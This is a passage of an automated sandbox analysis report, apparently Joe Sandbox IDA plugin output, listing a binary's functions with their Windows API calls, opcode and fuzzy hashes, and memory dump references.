Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: cdfb678453e64eaabc3d40da011a51b20e1443787f87a5bb05332e06c6d14a3d
Instruction ID: 64f2eeb24ba8a8cadc8974e83822933f6edb30a6dce283524ccd60b42f8b76a2
Opcode Fuzzy Hash: cdfb678453e64eaabc3d40da011a51b20e1443787f87a5bb05332e06c6d14a3d
Instruction Fuzzy Hash: 1901B13360030A9B8F1A8E598C4CFBA7759AF46730717422FE936CB291DB30DC118760

Function 003E5AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003E5B0B

Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E

RtlReAllocateHeap.NTDLL(00000000,?,00200000,?,?,003FCBE8,003C17A1,?,?,?,?,00000000,?,003C1378,?,?), ref: 003E5B47

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 72f9a9ddc420a988c8d0370a61886c9747ffb79d161556a312419d8c53579ee2
Instruction ID: f3384258d43108851adf773b69f9c25ccc79f7a747e39936992776d434ada953
Opcode Fuzzy Hash: 72f9a9ddc420a988c8d0370a61886c9747ffb79d161556a312419d8c53579ee2
Instruction Fuzzy Hash: 5BF06232711AB6A6DB332A279C01FAB375C9FD1778F164315F819AA5E2EB70980081F1

Function 003CD142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,00000200,?), ref: 003CD187
LoadStringW.USER32(?,?,00000200,?), ref: 003CD19D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 4974e47c73b2135809d7d0458163f26889316ae462d2a367b400f897f16a6aaa
Instruction ID: 38cd6b525bda2564eeb9bb1ccea8f1c7ba0b03b4c970d67f5005e7a93ec89ff7
Opcode Fuzzy Hash: 4974e47c73b2135809d7d0458163f26889316ae462d2a367b400f897f16a6aaa
Instruction Fuzzy Hash: EDF0CD7276122C6FEA139F10AC85FB77E5EEB05380F021839FA8AD6061D6224C01C7A0

Function 003CFCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 003CFCB3
GetProcessAffinityMask.KERNEL32(00000000), ref: 003CFCBA

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 24cf7e25d38685d79b1687547e17844faa1088d00f918405aebae710978062b3
Instruction ID: d043dfca14418fbed95b3a0523f7904fa68b63290a41a1feb14847afd7ee453d
Opcode Fuzzy Hash: 24cf7e25d38685d79b1687547e17844faa1088d00f918405aebae710978062b3
Instruction Fuzzy Hash: 16E0ED72F1010E6B8B1A86A89C05EFA729EEE44315B25817EED46D3600EA34DD5587A0

Function 003CA0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA0D7
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA108

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 032afa99d5af076bba87ff7f2307b58e39a8d671d7bb446c6b495b75a979066a
Instruction ID: e72c6cd7ab4f21448de4fca212d747bfc82472c417353449dc5778991ce2dc04
Opcode Fuzzy Hash: 032afa99d5af076bba87ff7f2307b58e39a8d671d7bb446c6b495b75a979066a
Instruction Fuzzy Hash: 92F0307125010EABDF125FA4EC01FEA776DAB04385F448065B988D6165DB329E98DB50

Function 003DC0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 003DC0FE
SetDlgItemTextW.USER32(00000065,?), ref: 003DC115

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 1b5ae64e649ecab58c3b06c114e678540ab193e0f68b41333b9cf90bc4007dda
Instruction ID: 3d048550d5197178fedb7a30e988d422f800591883a176cdb9591cfc48ecab25
Opcode Fuzzy Hash: 1b5ae64e649ecab58c3b06c114e678540ab193e0f68b41333b9cf90bc4007dda
Instruction Fuzzy Hash: 6AF05C73564309B6EB13B7609D06F9A3B1DAB04341F04405BB605A61E2D6719E20D351

Function 003C9DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,003C9611,?,?,003C946C), ref: 003C9DBD
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,003C9611,?,?,003C946C), ref: 003C9DEB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b8b66b7d1a722b8b38f2d423c09bf6bc37124056121bd10d99e22fe6292d1a5f
Instruction ID: 3d080d4794125be644aa1dd0638bcd2395a1bc920d645d82f0f77aef7574226f
Opcode Fuzzy Hash: b8b66b7d1a722b8b38f2d423c09bf6bc37124056121bd10d99e22fe6292d1a5f
Instruction Fuzzy Hash: 96E0223164020E6BDB129F64DC0AFEA73ACEB08382F840066B988D6050DF318C90DA90

Function 003C9E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,003C9E08,?,003C75A0,?,?,?,?), ref: 003C9E24
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,003C9E08,?,003C75A0,?,?,?,?), ref: 003C9E50

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 21a374d0093168d8ca37f65595c1f23ddaa4336b8c51043083e7dd0b716bcc63
Instruction ID: 3cdc4ce292f6f6eb239c1a4832f983c55beaddbb9e1781d8fa98f425b56865d2
Opcode Fuzzy Hash: 21a374d0093168d8ca37f65595c1f23ddaa4336b8c51043083e7dd0b716bcc63
Instruction Fuzzy Hash: 73E09B7250015857CB12ABA8DC09FE9776CDB187E2F0101A5FD48E7291DB705D84C7D0

Function 003CF309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 6924f271ea8ec5249cce0e8242c66fe3333669eab1a7b3615081991a60e61f7a
Instruction ID: a88335d8a58c38463fa329748ae6a6628315b2508dc48ce8b78b8eeb93f3a79f
Opcode Fuzzy Hash: 6924f271ea8ec5249cce0e8242c66fe3333669eab1a7b3615081991a60e61f7a
Instruction Fuzzy Hash: 19E012769111596BDB12AAA4DC05FEB7B6CEB09382F4440A6B948D2105DA74DD44CBB0

Function 003D8924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003D8945
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 003D894C

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 70fd264944850add7f86858a6cf8694d365e7b1139bc6f10602e46668444fb3d
Instruction ID: b3a12822bd098809faf9f2a59fe35fc6ce85da99c03925cb2794400fb2461753
Opcode Fuzzy Hash: 70fd264944850add7f86858a6cf8694d365e7b1139bc6f10602e46668444fb3d
Instruction Fuzzy Hash: 79E06576411208EFC711DF98D8017A9B7E8EB04311F10806BE88493700D7706E00DB91

Function 003D909E Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,003EF79B,000000FF), ref: 003D90C7
CoUninitialize.COMBASE(?,?,?,003EF79B,000000FF), ref: 003D90CC

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 8c92756b159e8e814150a50d23b799e7adf2d33b8b4f9efa7f2f31b5aa06ebc4
Instruction ID: 8ca96d960854be5e8f081653bee743f18a35e4f7e46c853ac7b2f6a0e9e285f1
Opcode Fuzzy Hash: 8c92756b159e8e814150a50d23b799e7adf2d33b8b4f9efa7f2f31b5aa06ebc4
Instruction Fuzzy Hash: D0E09A32504A409FC311DB4CDD05B41BBE9FB08B20F00876AB81A83BA0CB786800CA81

Function 003E0CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 003E1D9A: try_get_function.LIBVCRUNTIME ref: 003E1DAF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003E0CC4
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003E0CCF

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 64a161343733c2a33f164a477a7b98c55dbf03b5a95333e6c40b8e8dfc431b9f
Instruction ID: 2b98dba0c4224282569c77d5c57783070ff82452cb0ea90bdac06f4e5604c81c
Opcode Fuzzy Hash: 64a161343733c2a33f164a477a7b98c55dbf03b5a95333e6c40b8e8dfc431b9f
Instruction Fuzzy Hash: 1CD0A7755887B254590F237328124AB134864017707710746E0319D1C1EAE480C26516

Function 003C12C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 003C12D7
ShowWindow.USER32(00000000), ref: 003C12DE

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: a7610f4979d3e5028677f43f7917d9e2d6742e9f52acdeb2e493c08e2c55f33d
Instruction ID: dccfbde88bff98c72e505be29e60a1c23111f2418b21e7fc47685539f2b9ed3d
Opcode Fuzzy Hash: a7610f4979d3e5028677f43f7917d9e2d6742e9f52acdeb2e493c08e2c55f33d
Instruction Fuzzy Hash: 69C01272058500BFCB020F70DC09C3EBBAD9B95311F00C905B8A9C0060C238C410DB12

Function 003CFC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00401E74,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFC42
LeaveCriticalSection.KERNEL32(00401E74,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFC99

Part of subcall function 003CF9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 003CFA05
Part of subcall function 003CF9D1: CloseHandle.KERNEL32(?,?), ref: 003CFA1F
Part of subcall function 003CF9D1: DeleteCriticalSection.KERNEL32(?), ref: 003CFA38
Part of subcall function 003CF9D1: CloseHandle.KERNELBASE(?), ref: 003CFA44
Part of subcall function 003CF9D1: CloseHandle.KERNEL32(?), ref: 003CFA50

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
String ID:
API String ID: 3265325312-0
Opcode ID: e9dac9650bc0b3cb3cf98c6da6dfc354c01c20f324ec67677b3064278fb7c430
Instruction ID: 4684059537a05b54e6187c8cc26627c3d843d8e459b077c38c1da172cf75320e
Opcode Fuzzy Hash: e9dac9650bc0b3cb3cf98c6da6dfc354c01c20f324ec67677b3064278fb7c430
Instruction Fuzzy Hash: 76F081332042155FD6136724EC80E7EB71EDA85754326813EFC04A7252DB35AC0183A4

Function 003C19B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C19B6

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 30d2c9e06a70e7bf96a27d5a6fc5e037913c1de750669ae82518298921391199
Instruction ID: 5bea72dd1f8c6b7cc56f21e030c0b765ec047d156b6f2a19728f0efe58fd29b9
Opcode Fuzzy Hash: 30d2c9e06a70e7bf96a27d5a6fc5e037913c1de750669ae82518298921391199
Instruction Fuzzy Hash: D3B1C370A04646AEEB2ACF78C484FF9FBA5BF06304F15425EE455D7282CB31AC64DB91

Function 003C820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C8210

Part of subcall function 003C137E: __EH_prolog.LIBCMT ref: 003C1383
Part of subcall function 003C137E: new.LIBCMT ref: 003C13FB

Part of subcall function 003C19B1: __EH_prolog.LIBCMT ref: 003C19B6

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3462bfd6da3b75928c917c09da70ad3510b4a74cf4d13e003e01b73e3e1a49ad
Instruction ID: 761601f64405769615cd2a4b0891b5d1391303ff1c7805730437257d83e7ed27
Opcode Fuzzy Hash: 3462bfd6da3b75928c917c09da70ad3510b4a74cf4d13e003e01b73e3e1a49ad
Instruction Fuzzy Hash: FC41B1769006989ADB26EB60CC55FEAB369AF50700F0504EEE48AD7093DF746FC8DB50

Function 003D21E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003D21EB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

